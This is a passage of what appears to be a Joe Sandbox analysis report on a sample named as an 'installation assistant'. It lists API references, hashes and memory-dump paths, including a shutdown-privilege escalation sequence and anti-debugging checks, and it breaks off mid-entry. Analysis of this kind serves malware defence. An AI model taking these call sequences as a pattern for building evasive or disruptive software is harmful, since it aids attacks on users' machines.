                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                          • Instruction ID: d1521ca9d6ed7517a9bd6c10c33c9891ec03f29ba3ff07f7b0855960948a17ec
                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                          • Instruction Fuzzy Hash: 42F0ADB67016566EC6311E3A8F0CADA36989F5237CF100715E86092AD0DB70940A86E3
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C7B5AB4
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C7B5AF4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID:
                                          • API String ID: 323602529-0
                                          • Opcode ID: 27d1e74daf21d532288ae5089d17e1198f359adc2010ad4e2c5ca87c162013d0
                                          • Instruction ID: 700f472e0618d61eaff3d9e377deeb0302e8c53a46b1839cce672ac11dc52c94
                                          • Opcode Fuzzy Hash: 27d1e74daf21d532288ae5089d17e1198f359adc2010ad4e2c5ca87c162013d0
                                          • Instruction Fuzzy Hash: 93514571101B00DBE725CF24C989BE6BBE4BB05718F448A1CE4AA5BBA1DB30B548CB80
                                          APIs
                                          • GetLastError.KERNEL32(6C7E6DD8,0000000C), ref: 6C7BEF52
                                          • ExitThread.KERNEL32 ref: 6C7BEF59
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorExitLastThread
                                          • String ID:
                                          • API String ID: 1611280651-0
                                          • Opcode ID: 2714b6f1ec35ab792fdee3efe49efc9f558214334db95f064f8931487dde139b
                                          • Instruction ID: a8e37dd3a2ecd7d6c00cabeaaaf0b76228cd60a27a13764092cf34854624fddb
                                          • Opcode Fuzzy Hash: 2714b6f1ec35ab792fdee3efe49efc9f558214334db95f064f8931487dde139b
                                          • Instruction Fuzzy Hash: 64F0C2B2A00609AFDF049FB0C60DAAE3B74FF45318F144699E405A7B50CB349A05DBA2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 02c7d79f9b6fc060145b3c9a7d2dd8d22b64cdd1d144dab2f867b8f735db7897
                                          • Instruction ID: 2fa982062b62a8b488ca1befac0b9f6f023afb1216f1c7bcec3371f1b74b49b2
                                          • Opcode Fuzzy Hash: 02c7d79f9b6fc060145b3c9a7d2dd8d22b64cdd1d144dab2f867b8f735db7897
                                          • Instruction Fuzzy Hash: AF114C71A0420EAFCF05CF59E94599B7BF8EF89318F154069F805AB301D671E911CBA5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                          • Instruction ID: a8052f6bb848e9b1b80fb4ff5ac67ebeb10da25c98de450128d00043cf619058
                                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                          • Instruction Fuzzy Hash: 70014F72D01159BFCF019FA8CE099EE7FB5AF08314F1541A5ED24E26A0E7319A24EB91
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,6C7D4115,?,?,00000000,?,6C7D4115,00000000,0000000C), ref: 6C7D4474
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: cd61e296575fc5c0ab68013c2e7ded51405388bbe05d7821cd416183d0213fb7
                                          • Instruction ID: ca0233a4e6a2c7c7c1587d777d86393361c97674e4ba54a4d3c5e7a7aaeb9e57
                                          • Opcode Fuzzy Hash: cd61e296575fc5c0ab68013c2e7ded51405388bbe05d7821cd416183d0213fb7
                                          • Instruction Fuzzy Hash: CAD06C3210010DBBDF029F84DC06EDA3BAAFB8C714F014010BA1896020C732E861AB94
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                          • Instruction ID: a0ec8b4dbb89aa8b122b453a590b150c71aaa8962d66665afc1be00cba1e91fe
                                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                          • Instruction Fuzzy Hash:
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: g)''
                                          • API String ID: 4218353326-3487984327
                                          • Opcode ID: 21208dd9c6241b52c39521e4f934649b7ce7d465a86605b053e1398c13d1f991
                                          • Instruction ID: 11c8932d05050579d5debd5894a7f896100b204d653018455f7db017f37a9403
                                          • Opcode Fuzzy Hash: 21208dd9c6241b52c39521e4f934649b7ce7d465a86605b053e1398c13d1f991
                                          • Instruction Fuzzy Hash: F4630431645B018FC728CF28C9D0A95B7F3BFD53187198A6DC0EA5BA59EB74B44ACB40
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 6C7B5D6A
                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C7B5D76
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C7B5D84
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C7B5DAB
                                          • NtInitiatePowerAction.NTDLL ref: 6C7B5DBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3256374457-3733053543
                                          • Opcode ID: 85d03ccd315b2139987dc86bbbec79a9bbeda70d06d3db2aa1ef7752a34239a5
                                          • Instruction ID: ed7c1b3655899bd76693de8ee5dd668d4d098111e5066ba122ce2f26b4a52e06
                                          • Opcode Fuzzy Hash: 85d03ccd315b2139987dc86bbbec79a9bbeda70d06d3db2aa1ef7752a34239a5
                                          • Instruction Fuzzy Hash: F4F0B470644300BBEA106B24DE0FB9A7BB4EFC5705F014628F945A60D1E7706998CBD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \j`7$\j`7$j
                                          • API String ID: 0-3644614255
                                          • Opcode ID: 87e2480f1bef3d0dc6c1f53789074b93e084c651fc949edbf7b66180cd443fa0
                                          • Instruction ID: e63645eb99b498b13bcffb961c7cccd6fee9bc7c219a92d5adc0fc96066a5f5b
                                          • Opcode Fuzzy Hash: 87e2480f1bef3d0dc6c1f53789074b93e084c651fc949edbf7b66180cd443fa0
                                          • Instruction Fuzzy Hash: BE424374609392CFCB24CF28C48165ABBE1BBC9314F146A2EE499CB7A1D334D945CB57
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C816CE5
                                            • Part of subcall function 6C7ECC2A: __EH_prolog.LIBCMT ref: 6C7ECC2F
                                            • Part of subcall function 6C7EE6A6: __EH_prolog.LIBCMT ref: 6C7EE6AB
                                            • Part of subcall function 6C816A0E: __EH_prolog.LIBCMT ref: 6C816A13
                                            • Part of subcall function 6C816837: __EH_prolog.LIBCMT ref: 6C81683C
                                            • Part of subcall function 6C81A143: __EH_prolog.LIBCMT ref: 6C81A148
                                            • Part of subcall function 6C81A143: ctype.LIBCPMT ref: 6C81A16C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog$ctype
                                          • String ID:
                                          • API String ID: 1039218491-3916222277
                                          • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                          • Instruction ID: b9473507c065efa3e5418e1e7bb4b79e65b0fbd5059a0eea033ae1968c2c1c3c
                                          • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                          • Instruction Fuzzy Hash: D303C03180825ADFDF21CFA8CA48BDCBBB0AF15318F2484A9D44567A91DB345F8DCB61
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C7C0279
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C7C0283
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C7C0290
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 3e65909e0caec2565caa44eed92edefe0d9fa6517d48c79499558d663a174f0b
                                          • Instruction ID: d92796a1731542150cba0823c0aa58e96dbbd9451780a6847d9b0cbf39dc2b26
                                          • Opcode Fuzzy Hash: 3e65909e0caec2565caa44eed92edefe0d9fa6517d48c79499558d663a174f0b
                                          • Instruction Fuzzy Hash: 1031927590122DDBCB61DF68D988BCDBBB8BF08314F5042EAE41DA7250EB709B858F45
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,6C7BF235,?,?,?,?), ref: 6C7BF19F
                                          • TerminateProcess.KERNEL32(00000000,?,6C7BF235,?,?,?,?), ref: 6C7BF1A6
                                          • ExitProcess.KERNEL32 ref: 6C7BF1B8
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: e005e87528321e2c14226c2b237e330af3c6cf30851f5ed9659f2caf1884b4f8
                                          • Instruction ID: 3f9bcb5f8d5d13467717992bf00ffccc370b5d9666f42a42186f9af415e92fdc
                                          • Opcode Fuzzy Hash: e005e87528321e2c14226c2b237e330af3c6cf30851f5ed9659f2caf1884b4f8
                                          • Instruction Fuzzy Hash: F4E0463A102108AFCF426F94CA0CA993B38FB4A79AB000824F818D6630CB39D981DA40
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: x=J
                                          • API String ID: 3519838083-1497497802
                                          • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                          • Instruction ID: a74588756cf0caa454df1d272a2bd9db15d17f08861001b510b3503720ffedd6
                                          • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                          • Instruction Fuzzy Hash: D6910433D01209DACF04DFA8CA88AEDBB75FF6D35CF20806AD4516BA51DB325949CB50
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C7B78B0
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C7B80D3
                                            • Part of subcall function 6C7B9379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C7B80BC,00000000,?,?,?,6C7B80BC,?,6C7E554C), ref: 6C7B93D9
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                          • String ID:
                                          • API String ID: 915016180-0
                                          • Opcode ID: 2b7ba31abbde8b55ca5049308198407b95f26c005f2869ee3c15cb2d6e84b731
                                          • Instruction ID: 4167655ef424916aac151d51b07e264862d77efec98b2265018fbcfc2ad82558
                                          • Opcode Fuzzy Hash: 2b7ba31abbde8b55ca5049308198407b95f26c005f2869ee3c15cb2d6e84b731
                                          • Instruction Fuzzy Hash: 1CB1DE71A04609ABCB15CF55C98169EFBB4FB59318F24823ED416F7680E734E948CFA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @4J$DsL
                                          • API String ID: 0-2004129199
                                          • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                          • Instruction ID: 139334188a32b686a31c7c1e961d15fa8260d60bb3b93920e7f754bc176e18ab
                                          • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                          • Instruction Fuzzy Hash: 45217137AA49564BE74CCA68DC33EB92681E744305B89527EE94BCB7D1DF6D8800C648
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C80540F
                                            • Part of subcall function 6C806137: __EH_prolog.LIBCMT ref: 6C80613C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                          • Instruction ID: 978c65236188e12fb97e9a829bfba310cded602fa3e38cb6d6c607cf0239fc7f
                                          • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                          • Instruction Fuzzy Hash: 19628D71A00359CFDF25CF98CA94BDEBBB1BF04308F14496AE815AB680D7749A45CFA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: YA1
                                          • API String ID: 0-613462611
                                          • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                          • Instruction ID: 477fee4db3029f71f430893624851c9a7962a9a6abf30685096a656483f898b1
                                          • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                          • Instruction Fuzzy Hash: 8142F5706083818FC365CF28C69069ABBE2FFD9308F554D6EE8D58B741D6B1D856CB82
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aullrem
                                          • String ID:
                                          • API String ID: 3758378126-0
                                          • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                          • Instruction ID: 5e4481f93bd6e23b5c2962cbcf99a3c88b28e5ee668576b037d24460a91aee57
                                          • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                          • Instruction Fuzzy Hash: 4F51E671A092859BD710CF5AC4C12EAFBF6AF79214F18C05EE8C897342D27A599BC760
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                          • Instruction ID: 4d3d5e76309b8c7e347c3e21514121d56a5dd99c06c9a231847f565212ca77a2
                                          • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                          • Instruction Fuzzy Hash: AC029A316083A08BD325CF2ACA9479EBBE2EFC8348F144E2DE4D597B51C7759945CB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (SL
                                          • API String ID: 0-669240678
                                          • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                          • Instruction ID: 2e79977988b4cc91f88ed62cfd7318d145d4374469b03105bd1037211f4b6376
                                          • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
